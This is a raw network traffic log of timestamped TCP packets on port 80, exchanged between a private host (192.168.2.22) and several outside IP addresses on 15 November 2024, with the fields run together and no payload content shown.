                                                                                  Nov 15, 2024 06:45:40.678175926 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.678186893 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.678191900 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.678205013 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.678215027 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.678221941 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.678222895 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.678242922 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.678250074 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.678915024 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.678930044 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.678945065 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.678956985 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.678960085 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.678967953 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.678976059 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.678978920 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.678988934 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.678992033 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.679008961 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.679013968 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.679024935 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.679024935 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.679040909 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.679049015 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.679058075 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.679058075 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.679069996 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.679076910 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.679085970 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.679090023 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.679104090 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.679105043 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.679115057 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.679140091 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:49.497190952 CET4916380192.168.2.22172.217.18.115
                                                                                  Nov 15, 2024 06:45:49.502166986 CET8049163172.217.18.115192.168.2.22
                                                                                  Nov 15, 2024 06:45:49.502240896 CET4916380192.168.2.22172.217.18.115
                                                                                  Nov 15, 2024 06:45:49.511475086 CET4916380192.168.2.22172.217.18.115
                                                                                  Nov 15, 2024 06:45:49.516532898 CET8049163172.217.18.115192.168.2.22
                                                                                  Nov 15, 2024 06:45:49.516596079 CET8049163172.217.18.115192.168.2.22
                                                                                  Nov 15, 2024 06:45:49.516602993 CET4916380192.168.2.22172.217.18.115
                                                                                  Nov 15, 2024 06:45:49.521996021 CET8049163172.217.18.115192.168.2.22
                                                                                  Nov 15, 2024 06:45:50.439023972 CET8049163172.217.18.115192.168.2.22
                                                                                  Nov 15, 2024 06:45:50.559118032 CET8049163172.217.18.115192.168.2.22
                                                                                  Nov 15, 2024 06:45:50.559441090 CET4916380192.168.2.22172.217.18.115
                                                                                  Nov 15, 2024 06:45:51.016015053 CET4916380192.168.2.22172.217.18.115
                                                                                  Nov 15, 2024 06:45:52.032361031 CET4916480192.168.2.22172.217.18.115
                                                                                  Nov 15, 2024 06:45:52.037911892 CET8049164172.217.18.115192.168.2.22
                                                                                  Nov 15, 2024 06:45:52.038069010 CET4916480192.168.2.22172.217.18.115
                                                                                  Nov 15, 2024 06:45:52.046972036 CET4916480192.168.2.22172.217.18.115
                                                                                  Nov 15, 2024 06:45:52.051918030 CET8049164172.217.18.115192.168.2.22
                                                                                  Nov 15, 2024 06:45:53.006546021 CET8049164172.217.18.115192.168.2.22
                                                                                  Nov 15, 2024 06:45:53.130925894 CET8049164172.217.18.115192.168.2.22
                                                                                  Nov 15, 2024 06:45:53.131150007 CET4916480192.168.2.22172.217.18.115
                                                                                  Nov 15, 2024 06:45:53.558860064 CET4916480192.168.2.22172.217.18.115
                                                                                  Nov 15, 2024 06:45:54.575170040 CET4916580192.168.2.22172.217.18.115
                                                                                  Nov 15, 2024 06:45:54.580267906 CET8049165172.217.18.115192.168.2.22
                                                                                  Nov 15, 2024 06:45:54.580322027 CET4916580192.168.2.22172.217.18.115
                                                                                  Nov 15, 2024 06:45:54.589394093 CET4916580192.168.2.22172.217.18.115
                                                                                  Nov 15, 2024 06:45:54.594257116 CET8049165172.217.18.115192.168.2.22
                                                                                  Nov 15, 2024 06:45:54.594305992 CET4916580192.168.2.22172.217.18.115
                                                                                  Nov 15, 2024 06:45:54.594376087 CET8049165172.217.18.115192.168.2.22
                                                                                  Nov 15, 2024 06:45:54.600013018 CET8049165172.217.18.115192.168.2.22
                                                                                  Nov 15, 2024 06:45:54.600027084 CET8049165172.217.18.115192.168.2.22
                                                                                  Nov 15, 2024 06:45:55.517364979 CET8049165172.217.18.115192.168.2.22
                                                                                  Nov 15, 2024 06:45:55.637799025 CET8049165172.217.18.115192.168.2.22
                                                                                  Nov 15, 2024 06:45:55.637996912 CET4916580192.168.2.22172.217.18.115
                                                                                  Nov 15, 2024 06:45:56.101562023 CET4916580192.168.2.22172.217.18.115
                                                                                  Nov 15, 2024 06:45:57.125214100 CET4916680192.168.2.22172.217.18.115
                                                                                  Nov 15, 2024 06:45:57.133294106 CET8049166172.217.18.115192.168.2.22
                                                                                  Nov 15, 2024 06:45:57.133371115 CET4916680192.168.2.22172.217.18.115
                                                                                  Nov 15, 2024 06:45:57.191088915 CET4916680192.168.2.22172.217.18.115
                                                                                  Nov 15, 2024 06:45:57.197652102 CET8049166172.217.18.115192.168.2.22
                                                                                  Nov 15, 2024 06:45:58.073215008 CET8049166172.217.18.115192.168.2.22
                                                                                  Nov 15, 2024 06:45:58.192625046 CET8049166172.217.18.115192.168.2.22
                                                                                  Nov 15, 2024 06:45:58.192835093 CET4916680192.168.2.22172.217.18.115
                                                                                  Nov 15, 2024 06:45:58.193515062 CET4916680192.168.2.22172.217.18.115
                                                                                  Nov 15, 2024 06:45:58.198349953 CET8049166172.217.18.115192.168.2.22
                                                                                  Nov 15, 2024 06:46:03.355813980 CET4916780192.168.2.2269.57.163.227
                                                                                  Nov 15, 2024 06:46:03.360728025 CET804916769.57.163.227192.168.2.22
                                                                                  Nov 15, 2024 06:46:03.360793114 CET4916780192.168.2.2269.57.163.227
                                                                                  Nov 15, 2024 06:46:03.379935026 CET4916780192.168.2.2269.57.163.227
                                                                                  Nov 15, 2024 06:46:03.384799004 CET804916769.57.163.227192.168.2.22
                                                                                  Nov 15, 2024 06:46:03.384865046 CET4916780192.168.2.2269.57.163.227
                                                                                  Nov 15, 2024 06:46:03.384953976 CET804916769.57.163.227192.168.2.22
                                                                                  Nov 15, 2024 06:46:03.389678001 CET804916769.57.163.227192.168.2.22
                                                                                  Nov 15, 2024 06:46:04.127661943 CET804916769.57.163.227192.168.2.22
                                                                                  Nov 15, 2024 06:46:04.127682924 CET804916769.57.163.227192.168.2.22
                                                                                  Nov 15, 2024 06:46:04.127688885 CET804916769.57.163.227192.168.2.22
                                                                                  Nov 15, 2024 06:46:04.127902985 CET4916780192.168.2.2269.57.163.227
                                                                                  Nov 15, 2024 06:46:04.884577036 CET4916780192.168.2.2269.57.163.227
                                                                                  Nov 15, 2024 06:46:05.900852919 CET4916880192.168.2.2269.57.163.227
                                                                                  Nov 15, 2024 06:46:05.906806946 CET804916869.57.163.227192.168.2.22
                                                                                  Nov 15, 2024 06:46:05.906884909 CET4916880192.168.2.2269.57.163.227
                                                                                  Nov 15, 2024 06:46:05.916166067 CET4916880192.168.2.2269.57.163.227
                                                                                  Nov 15, 2024 06:46:05.921101093 CET804916869.57.163.227192.168.2.22
                                                                                  Nov 15, 2024 06:46:06.590946913 CET804916869.57.163.227192.168.2.22
                                                                                  Nov 15, 2024 06:46:06.629024982 CET804916869.57.163.227192.168.2.22
                                                                                  Nov 15, 2024 06:46:06.629230022 CET4916880192.168.2.2269.57.163.227
                                                                                  Nov 15, 2024 06:46:07.433166027 CET4916880192.168.2.2269.57.163.227
                                                                                  Nov 15, 2024 06:46:08.443480968 CET4916980192.168.2.2269.57.163.227
                                                                                  Nov 15, 2024 06:46:08.629759073 CET804916969.57.163.227192.168.2.22
                                                                                  Nov 15, 2024 06:46:08.630084038 CET4916980192.168.2.2269.57.163.227
                                                                                  Nov 15, 2024 06:46:08.645531893 CET4916980192.168.2.2269.57.163.227
                                                                                  Nov 15, 2024 06:46:08.650594950 CET804916969.57.163.227192.168.2.22
                                                                                  Nov 15, 2024 06:46:08.650830030 CET4916980192.168.2.2269.57.163.227
                                                                                  Nov 15, 2024 06:46:08.650935888 CET804916969.57.163.227192.168.2.22
                                                                                  Nov 15, 2024 06:46:08.655853033 CET804916969.57.163.227192.168.2.22
                                                                                  Nov 15, 2024 06:46:08.655883074 CET804916969.57.163.227192.168.2.22
                                                                                  Nov 15, 2024 06:46:09.585263968 CET804916969.57.163.227192.168.2.22
                                                                                  Nov 15, 2024 06:46:09.585304976 CET804916969.57.163.227192.168.2.22
                                                                                  Nov 15, 2024 06:46:09.585330963 CET804916969.57.163.227192.168.2.22
                                                                                  Nov 15, 2024 06:46:09.585467100 CET4916980192.168.2.2269.57.163.227
                                                                                  Nov 15, 2024 06:46:09.585522890 CET804916969.57.163.227192.168.2.22
                                                                                  Nov 15, 2024 06:46:09.585591078 CET4916980192.168.2.2269.57.163.227
                                                                                  Nov 15, 2024 06:46:10.158902884 CET4916980192.168.2.2269.57.163.227
                                                                                  Nov 15, 2024 06:46:11.175304890 CET4917080192.168.2.2269.57.163.227
                                                                                  Nov 15, 2024 06:46:11.181129932 CET804917069.57.163.227192.168.2.22
                                                                                  Nov 15, 2024 06:46:11.181317091 CET4917080192.168.2.2269.57.163.227
                                                                                  Nov 15, 2024 06:46:11.191468000 CET4917080192.168.2.2269.57.163.227
                                                                                  Nov 15, 2024 06:46:11.196499109 CET804917069.57.163.227192.168.2.22
                                                                                  Nov 15, 2024 06:46:11.869606972 CET804917069.57.163.227192.168.2.22
                                                                                  Nov 15, 2024 06:46:11.908133030 CET804917069.57.163.227192.168.2.22
                                                                                  Nov 15, 2024 06:46:11.908248901 CET4917080192.168.2.2269.57.163.227
                                                                                  Nov 15, 2024 06:46:11.909454107 CET4917080192.168.2.2269.57.163.227
                                                                                  Nov 15, 2024 06:46:11.914521933 CET804917069.57.163.227192.168.2.22
                                                                                  Nov 15, 2024 06:46:16.938222885 CET4917180192.168.2.2215.197.148.33
                                                                                  Nov 15, 2024 06:46:16.943197012 CET804917115.197.148.33192.168.2.22
                                                                                  Nov 15, 2024 06:46:16.943270922 CET4917180192.168.2.2215.197.148.33
                                                                                  Nov 15, 2024 06:46:16.953824997 CET4917180192.168.2.2215.197.148.33
                                                                                  Nov 15, 2024 06:46:16.958878040 CET804917115.197.148.33192.168.2.22
                                                                                  Nov 15, 2024 06:46:16.959029913 CET4917180192.168.2.2215.197.148.33
                                                                                  Nov 15, 2024 06:46:16.959139109 CET804917115.197.148.33192.168.2.22
                                                                                  Nov 15, 2024 06:46:16.964112997 CET804917115.197.148.33192.168.2.22
                                                                                  Nov 15, 2024 06:46:17.570067883 CET804917115.197.148.33192.168.2.22
                                                                                  Nov 15, 2024 06:46:17.570297003 CET4917180192.168.2.2215.197.148.33
                                                                                  Nov 15, 2024 06:46:18.456455946 CET4917180192.168.2.2215.197.148.33
                                                                                  Nov 15, 2024 06:46:18.752902031 CET4917180192.168.2.2215.197.148.33
                                                                                  Nov 15, 2024 06:46:19.233257055 CET804917115.197.148.33192.168.2.22
                                                                                  Nov 15, 2024 06:46:19.233278036 CET804917115.197.148.33192.168.2.22
                                                                                  Nov 15, 2024 06:46:19.233351946 CET4917180192.168.2.2215.197.148.33
                                                                                  Nov 15, 2024 06:46:19.472851038 CET4917280192.168.2.2215.197.148.33
                                                                                  Nov 15, 2024 06:46:19.477996111 CET804917215.197.148.33192.168.2.22
                                                                                  Nov 15, 2024 06:46:19.478199959 CET4917280192.168.2.2215.197.148.33
                                                                                  Nov 15, 2024 06:46:19.489862919 CET4917280192.168.2.2215.197.148.33
                                                                                  Nov 15, 2024 06:46:19.494899988 CET804917215.197.148.33192.168.2.22
                                                                                  Nov 15, 2024 06:46:20.999397039 CET4917280192.168.2.2215.197.148.33
                                                                                  Nov 15, 2024 06:46:21.067873001 CET804917215.197.148.33192.168.2.22
                                                                                  Nov 15, 2024 06:46:21.067900896 CET804917215.197.148.33192.168.2.22
                                                                                  Nov 15, 2024 06:46:21.067913055 CET804917215.197.148.33192.168.2.22
                                                                                  Nov 15, 2024 06:46:21.067986965 CET804917215.197.148.33192.168.2.22
                                                                                  Nov 15, 2024 06:46:21.068193913 CET4917280192.168.2.2215.197.148.33
                                                                                  Nov 15, 2024 06:46:21.068195105 CET4917280192.168.2.2215.197.148.33
                                                                                  Nov 15, 2024 06:46:21.068195105 CET4917280192.168.2.2215.197.148.33
                                                                                  Nov 15, 2024 06:46:21.070796013 CET804917215.197.148.33192.168.2.22
                                                                                  Nov 15, 2024 06:46:22.015551090 CET4917380192.168.2.2215.197.148.33
                                                                                  Nov 15, 2024 06:46:22.020859003 CET804917315.197.148.33192.168.2.22
                                                                                  Nov 15, 2024 06:46:22.021173000 CET4917380192.168.2.2215.197.148.33
                                                                                  Nov 15, 2024 06:46:22.028925896 CET4917380192.168.2.2215.197.148.33
                                                                                  Nov 15, 2024 06:46:22.034061909 CET804917315.197.148.33192.168.2.22
                                                                                  Nov 15, 2024 06:46:22.034459114 CET4917380192.168.2.2215.197.148.33
                                                                                  Nov 15, 2024 06:46:22.034547091 CET804917315.197.148.33192.168.2.22
                                                                                  Nov 15, 2024 06:46:22.039498091 CET804917315.197.148.33192.168.2.22
                                                                                  Nov 15, 2024 06:46:22.039827108 CET804917315.197.148.33192.168.2.22
                                                                                  Nov 15, 2024 06:46:22.682054996 CET804917315.197.148.33192.168.2.22
                                                                                  Nov 15, 2024 06:46:22.682527065 CET4917380192.168.2.2215.197.148.33
                                                                                  Nov 15, 2024 06:46:23.542222977 CET4917380192.168.2.2215.197.148.33
                                                                                  Nov 15, 2024 06:46:23.585093975 CET804917315.197.148.33192.168.2.22
                                                                                  Nov 15, 2024 06:46:24.560646057 CET4917480192.168.2.2215.197.148.33
                                                                                  Nov 15, 2024 06:46:24.565722942 CET804917415.197.148.33192.168.2.22
                                                                                  Nov 15, 2024 06:46:24.566098928 CET4917480192.168.2.2215.197.148.33
                                                                                  Nov 15, 2024 06:46:24.580024004 CET4917480192.168.2.2215.197.148.33
                                                                                  Nov 15, 2024 06:46:24.584971905 CET804917415.197.148.33192.168.2.22
                                                                                  Nov 15, 2024 06:46:25.192630053 CET804917415.197.148.33192.168.2.22
                                                                                  Nov 15, 2024 06:46:25.193226099 CET804917415.197.148.33192.168.2.22
                                                                                  Nov 15, 2024 06:46:25.193334103 CET4917480192.168.2.2215.197.148.33
                                                                                  Nov 15, 2024 06:46:25.198539019 CET4917480192.168.2.2215.197.148.33
                                                                                  Nov 15, 2024 06:46:25.203731060 CET804917415.197.148.33192.168.2.22
                                                                                  Nov 15, 2024 06:46:30.322555065 CET4917580192.168.2.22162.241.63.77
                                                                                  Nov 15, 2024 06:46:30.327579975 CET8049175162.241.63.77192.168.2.22
                                                                                  Nov 15, 2024 06:46:30.327649117 CET4917580192.168.2.22162.241.63.77
                                                                                  Nov 15, 2024 06:46:30.337344885 CET4917580192.168.2.22162.241.63.77
                                                                                  Nov 15, 2024 06:46:30.342324972 CET8049175162.241.63.77192.168.2.22
                                                                                  Nov 15, 2024 06:46:30.342377901 CET4917580192.168.2.22162.241.63.77
                                                                                  Nov 15, 2024 06:46:30.342400074 CET8049175162.241.63.77192.168.2.22
                                                                                  Nov 15, 2024 06:46:30.347301006 CET8049175162.241.63.77192.168.2.22
                                                                                  Nov 15, 2024 06:46:31.050699949 CET8049175162.241.63.77192.168.2.22
                                                                                  Nov 15, 2024 06:46:31.050812006 CET8049175162.241.63.77192.168.2.22
                                                                                  Nov 15, 2024 06:46:31.050910950 CET4917580192.168.2.22162.241.63.77
                                                                                  Nov 15, 2024 06:46:31.841203928 CET4917580192.168.2.22162.241.63.77
                                                                                  Nov 15, 2024 06:46:32.857984066 CET4917680192.168.2.22162.241.63.77
                                                                                  Nov 15, 2024 06:46:32.863266945 CET8049176162.241.63.77192.168.2.22
                                                                                  Nov 15, 2024 06:46:32.863357067 CET4917680192.168.2.22162.241.63.77
                                                                                  Nov 15, 2024 06:46:32.872704983 CET4917680192.168.2.22162.241.63.77
                                                                                  Nov 15, 2024 06:46:32.877638102 CET8049176162.241.63.77192.168.2.22
                                                                                  Nov 15, 2024 06:46:33.603538990 CET8049176162.241.63.77192.168.2.22
                                                                                  Nov 15, 2024 06:46:33.603565931 CET8049176162.241.63.77192.168.2.22
                                                                                  Nov 15, 2024 06:46:33.603646994 CET4917680192.168.2.22162.241.63.77
                                                                                  Nov 15, 2024 06:46:34.383933067 CET4917680192.168.2.22162.241.63.77
                                                                                  Nov 15, 2024 06:46:35.401563883 CET4917780192.168.2.22162.241.63.77
                                                                                  Nov 15, 2024 06:46:35.406656027 CET8049177162.241.63.77192.168.2.22
                                                                                  Nov 15, 2024 06:46:35.406831980 CET4917780192.168.2.22162.241.63.77
                                                                                  Nov 15, 2024 06:46:35.416665077 CET4917780192.168.2.22162.241.63.77
                                                                                  Nov 15, 2024 06:46:35.421616077 CET8049177162.241.63.77192.168.2.22
                                                                                  Nov 15, 2024 06:46:35.421690941 CET4917780192.168.2.22162.241.63.77
                                                                                  Nov 15, 2024 06:46:35.421780109 CET8049177162.241.63.77192.168.2.22
                                                                                  Nov 15, 2024 06:46:35.426944017 CET8049177162.241.63.77192.168.2.22
                                                                                  Nov 15, 2024 06:46:35.426979065 CET8049177162.241.63.77192.168.2.22
                                                                                  Nov 15, 2024 06:46:36.134892941 CET8049177162.241.63.77192.168.2.22
                                                                                  Nov 15, 2024 06:46:36.134943008 CET8049177162.241.63.77192.168.2.22
                                                                                  Nov 15, 2024 06:46:36.135201931 CET4917780192.168.2.22162.241.63.77
                                                                                  Nov 15, 2024 06:46:36.930583954 CET4917780192.168.2.22162.241.63.77
                                                                                  Nov 15, 2024 06:46:37.944319010 CET4917880192.168.2.22162.241.63.77
                                                                                  Nov 15, 2024 06:46:37.949321032 CET8049178162.241.63.77192.168.2.22
                                                                                  Nov 15, 2024 06:46:37.949377060 CET4917880192.168.2.22162.241.63.77
                                                                                  Nov 15, 2024 06:46:37.955368996 CET4917880192.168.2.22162.241.63.77
                                                                                  Nov 15, 2024 06:46:37.960171938 CET8049178162.241.63.77192.168.2.22
                                                                                  Nov 15, 2024 06:46:39.083221912 CET8049178162.241.63.77192.168.2.22
                                                                                  Nov 15, 2024 06:46:39.293298960 CET8049178162.241.63.77192.168.2.22
                                                                                  Nov 15, 2024 06:46:39.293410063 CET4917880192.168.2.22162.241.63.77
                                                                                  Nov 15, 2024 06:46:39.937838078 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:46:39.943682909 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:46:39.943873882 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:46:40.201988935 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:46:40.202263117 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:46:40.207993984 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:46:44.099700928 CET8049178162.241.63.77192.168.2.22
                                                                                  Nov 15, 2024 06:46:44.099924088 CET4917880192.168.2.22162.241.63.77
                                                                                  Nov 15, 2024 06:46:44.100871086 CET4917880192.168.2.22162.241.63.77
                                                                                  Nov 15, 2024 06:46:44.105815887 CET8049178162.241.63.77192.168.2.22
                                                                                  Nov 15, 2024 06:46:49.232501984 CET4917980192.168.2.22141.193.213.11
                                                                                  Nov 15, 2024 06:46:49.237361908 CET8049179141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:49.237447023 CET4917980192.168.2.22141.193.213.11
                                                                                  Nov 15, 2024 06:46:49.246666908 CET4917980192.168.2.22141.193.213.11
                                                                                  Nov 15, 2024 06:46:49.251684904 CET8049179141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:49.251743078 CET4917980192.168.2.22141.193.213.11
                                                                                  Nov 15, 2024 06:46:49.251899958 CET8049179141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:49.256663084 CET8049179141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:49.932040930 CET8049179141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:49.932059050 CET8049179141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:49.932075024 CET8049179141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:49.932116032 CET4917980192.168.2.22141.193.213.11
                                                                                  Nov 15, 2024 06:46:49.932132959 CET8049179141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:49.932146072 CET8049179141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:49.932200909 CET4917980192.168.2.22141.193.213.11
                                                                                  Nov 15, 2024 06:46:49.932257891 CET8049179141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:49.932301998 CET4917980192.168.2.22141.193.213.11
                                                                                  Nov 15, 2024 06:46:49.933645010 CET8049179141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:49.933692932 CET4917980192.168.2.22141.193.213.11
                                                                                  Nov 15, 2024 06:46:50.748460054 CET4917980192.168.2.22141.193.213.11
                                                                                  Nov 15, 2024 06:46:51.785506010 CET4918080192.168.2.22141.193.213.11
                                                                                  Nov 15, 2024 06:46:51.790615082 CET8049180141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:51.790676117 CET4918080192.168.2.22141.193.213.11
                                                                                  Nov 15, 2024 06:46:51.825177908 CET4918080192.168.2.22141.193.213.11
                                                                                  Nov 15, 2024 06:46:51.830404043 CET8049180141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:52.473267078 CET8049180141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:52.473284006 CET8049180141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:52.473294020 CET8049180141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:52.473335028 CET4918080192.168.2.22141.193.213.11
                                                                                  Nov 15, 2024 06:46:52.473345041 CET8049180141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:52.473357916 CET8049180141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:52.473387003 CET4918080192.168.2.22141.193.213.11
                                                                                  Nov 15, 2024 06:46:52.473510981 CET8049180141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:52.475193977 CET8049180141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:52.475236893 CET4918080192.168.2.22141.193.213.11
                                                                                  Nov 15, 2024 06:46:53.338084936 CET4918080192.168.2.22141.193.213.11
                                                                                  Nov 15, 2024 06:46:54.354480028 CET4918180192.168.2.22141.193.213.11
                                                                                  Nov 15, 2024 06:46:54.359684944 CET8049181141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:54.362484932 CET4918180192.168.2.22141.193.213.11
                                                                                  Nov 15, 2024 06:46:54.369551897 CET4918180192.168.2.22141.193.213.11
                                                                                  Nov 15, 2024 06:46:54.374627113 CET8049181141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:54.374707937 CET8049181141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:54.374877930 CET4918180192.168.2.22141.193.213.11
                                                                                  Nov 15, 2024 06:46:54.379973888 CET8049181141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:54.379978895 CET8049181141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:55.057588100 CET8049181141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:55.057598114 CET8049181141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:55.057615042 CET8049181141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:55.057621002 CET8049181141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:55.057630062 CET8049181141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:55.057636976 CET8049181141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:55.057641029 CET8049181141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:55.057889938 CET4918180192.168.2.22141.193.213.11
                                                                                  Nov 15, 2024 06:46:55.060259104 CET8049181141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:55.062762976 CET4918180192.168.2.22141.193.213.11
                                                                                  Nov 15, 2024 06:46:55.880707979 CET4918180192.168.2.22141.193.213.11
                                                                                  Nov 15, 2024 06:46:56.897041082 CET4918280192.168.2.22141.193.213.11
                                                                                  Nov 15, 2024 06:46:56.902302027 CET8049182141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:56.902532101 CET4918280192.168.2.22141.193.213.11
                                                                                  Nov 15, 2024 06:46:56.908761978 CET4918280192.168.2.22141.193.213.11
                                                                                  Nov 15, 2024 06:46:56.913897038 CET8049182141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:57.606282949 CET8049182141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:57.607439041 CET8049182141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:46:57.607502937 CET4918280192.168.2.22141.193.213.11
                                                                                  Nov 15, 2024 06:46:57.609045982 CET4918280192.168.2.22141.193.213.11
                                                                                  Nov 15, 2024 06:46:57.613886118 CET8049182141.193.213.11192.168.2.22
                                                                                  Nov 15, 2024 06:47:02.663711071 CET4918380192.168.2.2213.248.213.45
                                                                                  Nov 15, 2024 06:47:02.668742895 CET804918313.248.213.45192.168.2.22
                                                                                  Nov 15, 2024 06:47:02.668930054 CET4918380192.168.2.2213.248.213.45
                                                                                  Nov 15, 2024 06:47:02.685404062 CET4918380192.168.2.2213.248.213.45
                                                                                  Nov 15, 2024 06:47:02.690265894 CET804918313.248.213.45192.168.2.22
                                                                                  Nov 15, 2024 06:47:02.690366983 CET804918313.248.213.45192.168.2.22
                                                                                  Nov 15, 2024 06:47:02.690434933 CET4918380192.168.2.2213.248.213.45
                                                                                  Nov 15, 2024 06:47:02.695257902 CET804918313.248.213.45192.168.2.22
                                                                                  Nov 15, 2024 06:47:04.198451996 CET4918380192.168.2.2213.248.213.45
                                                                                  Nov 15, 2024 06:47:04.203954935 CET804918313.248.213.45192.168.2.22
                                                                                  Nov 15, 2024 06:47:04.206510067 CET4918380192.168.2.2213.248.213.45
                                                                                  Nov 15, 2024 06:47:05.212052107 CET4918480192.168.2.2213.248.213.45
                                                                                  Nov 15, 2024 06:47:05.217669964 CET804918413.248.213.45192.168.2.22
                                                                                  Nov 15, 2024 06:47:05.217730999 CET4918480192.168.2.2213.248.213.45
                                                                                  Nov 15, 2024 06:47:05.226866007 CET4918480192.168.2.2213.248.213.45
                                                                                  Nov 15, 2024 06:47:05.231980085 CET804918413.248.213.45192.168.2.22
                                                                                  Nov 15, 2024 06:47:05.847001076 CET804918413.248.213.45192.168.2.22
                                                                                  Nov 15, 2024 06:47:05.847058058 CET4918480192.168.2.2213.248.213.45
                                                                                  Nov 15, 2024 06:47:06.740427971 CET4918480192.168.2.2213.248.213.45
                                                                                  Nov 15, 2024 06:47:06.745651007 CET804918413.248.213.45192.168.2.22
                                                                                  Nov 15, 2024 06:47:07.755165100 CET4918580192.168.2.2213.248.213.45
                                                                                  Nov 15, 2024 06:47:07.910330057 CET804918513.248.213.45192.168.2.22
                                                                                  Nov 15, 2024 06:47:07.910418034 CET4918580192.168.2.2213.248.213.45
                                                                                  Nov 15, 2024 06:47:07.923243046 CET4918580192.168.2.2213.248.213.45
                                                                                  Nov 15, 2024 06:47:07.928168058 CET804918513.248.213.45192.168.2.22
                                                                                  Nov 15, 2024 06:47:07.928212881 CET4918580192.168.2.2213.248.213.45
                                                                                  Nov 15, 2024 06:47:07.928390026 CET804918513.248.213.45192.168.2.22
                                                                                  Nov 15, 2024 06:47:07.933098078 CET804918513.248.213.45192.168.2.22
                                                                                  Nov 15, 2024 06:47:07.933110952 CET804918513.248.213.45192.168.2.22
                                                                                  Nov 15, 2024 06:47:08.535449982 CET804918513.248.213.45192.168.2.22
